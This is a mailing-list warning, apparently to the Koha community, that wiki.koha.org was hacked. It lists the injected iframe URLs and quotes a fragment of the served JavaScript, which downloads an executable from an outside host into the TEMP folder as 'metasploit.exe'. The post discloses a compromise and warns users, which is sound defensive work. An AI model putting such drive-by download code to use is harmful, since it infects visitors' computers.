To everybody. http://wiki.koha.org has been hacked : when you try to open a page, something with a .wmf + a large javascript is loaded. If you go to the wiki under linux/Mac OSX, it is just impossible to use. If you go to the wiki under MS-windows, it's probably impossible to use + do some nasty things on your computer. SO, AVOID GOING TO WIKI.KOHA.ORG Kados / chris : it seems (with lynx, that don't enjoy javascript ;-) ) that all pages contains on the top an iframe to IFRAME: http://uniqcount.net/adv/new.php?adv=9 IFRAME: http://uniqcount.net/adv/09/new3.php going to this address give a page with javascript containing : ============================================ Log('Ceating the XMLHTTP object...'); var url = "http://uniqcount.net/adv/09/win32.exe"; var xml = null; var bin = e.Item("TEMP")+ "\\" + "metasploit.exe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xml = new ActiveXObject("MSXML2.ServerXMLHTTP"); } =========================================== metasploit.exe is something really nasty : http://seclists.org/vuln-dev/2004/Apr/0011.html -- Paul POULAIN et Henri Damien LAURENT Consultants indépendants en logiciels libres et bibliothéconomie (http://www.koha-fr.org) Tel : 04 91 31 45 19